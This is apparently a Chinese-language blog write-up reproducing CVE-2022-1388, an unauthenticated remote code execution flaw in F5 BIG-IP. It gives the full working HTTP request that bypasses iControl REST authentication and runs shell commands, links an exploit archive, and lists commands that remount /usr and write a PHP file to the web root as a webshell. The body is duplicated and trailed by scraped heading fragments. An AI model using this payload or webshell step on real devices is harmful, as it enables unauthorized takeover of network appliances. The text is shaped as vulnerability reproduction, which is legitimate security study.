CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell

漏洞描述

漏洞描述: 在 F5 BIG-IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6 之前的 14.1.x 版本、13.1.5 之前的 13.1.x 版本以及所有 12.1.x和 11.6.x 版本，未公开的请求可能会绕过 iControl REST 身份验证。注意：未评估已达到技术支持终止 (EoTS) 的软件版本.

复现过程

HTTP请求包如下：

POST /mgmt/tm/util/bash HTTP/1.1
Host:xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type:application/json
{
"command":"run",
"utilCmdArgs":"-c id"
}

‍

EXP/POC

‍ CVE-2022-1388-EXP-main.zip ‍

Webshell写入

反弹获得了shell。 ‍ Webshell的写入可以参考另外一个漏洞F5 BIG-IP CVE-2020-5902 写入的路径为：/usr/local/www

mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr

访问路径：

‍

‍ ‍

参考

‍ ‍ F5 BIG-IP远程代码执行漏洞复现（CVE-2020-5902） ‍ CVE-2020-5902:F5 BIG-IP RCE分析研究 ‍ ‍ ‍

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell

漏洞描述

复现过程

HTTP请求包如下：

POST /mgmt/tm/util/bash HTTP/1.1
Host:xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type:application/json
{
"command":"run",
"utilCmdArgs":"-c id"
}

‍

EXP/POC

‍ CVE-2022-1388-EXP-main.zip ‍

Webshell写入

反弹获得了shell。 ‍ Webshell的写入可以参考另外一个漏洞F5 BIG-IP CVE-2020-5902 写入的路径为：/usr/local/www

mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr

访问路径：

‍

‍ ‍

参考

‍ ‍ F5 BIG-IP远程代码执行漏洞复现（CVE-2020-5902） ‍ CVE-2020-5902:F5 BIG-IP RCE分析研究 ‍ ‍ ‍

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell

漏洞描述

复现过程

EXP/POC

Webshell写入

参考

Search

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell

漏洞描述

复现过程

EXP/POC

Webshell写入

参考